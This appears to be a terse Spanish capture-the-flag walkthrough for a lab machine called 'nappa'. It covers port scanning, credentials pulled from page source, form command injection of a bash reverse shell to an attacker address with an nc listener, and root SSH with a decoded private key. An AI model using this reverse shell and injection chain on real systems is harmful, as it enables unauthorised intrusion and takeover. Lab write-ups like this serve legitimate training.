nmap -A -p- -oA nappa 192.168.77.114 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA nappa 192.168.77.114

nmap -sU -O -p- -oA nappa-udp 192.168.77.114

nikto -h 192.168.77.114:80

Pasted image 20211102081239.png

Pasted image 20211102081715.png

Pasted image 20211102083534.png

Nos registramos y vamos al foro en Features Roadmap

Pasted image 20211102083856.png

Hacemos un Ctrl + U en http://192.168.77.114:8080/register

Pasted image 20211102083947.png

credenciales

admin.forum@easysetting.com:it0jNc6L/r090Q==

Pasted image 20211102084636.png

Modificamos el codigo de html y quitamos los comentarios. tambien borramos el atributo de readonly.

bash -c 'bash -i >& /dev/tcp/192.168.49.77/3306 0>&1'

nc -lvnp 3306

Al introducir el siguiente comando en el formulario. Hacemos click en submit query.

Pasted image 20211102091655.png

cat ~/.bashrc

echo -n "FUWS2L......" | base32 -d

Pasted image 20211102092027.png

Conseguimos una llave y lo metemos en id_rsa

chmod 600 id_rsa

Pasted image 20211102092333.png

ssh -i id_rsa root@192.168.77.114 -p60022

Pasted image 20211102093707.png

boxes

copyright©2022 Cu3rv0x all rights reserved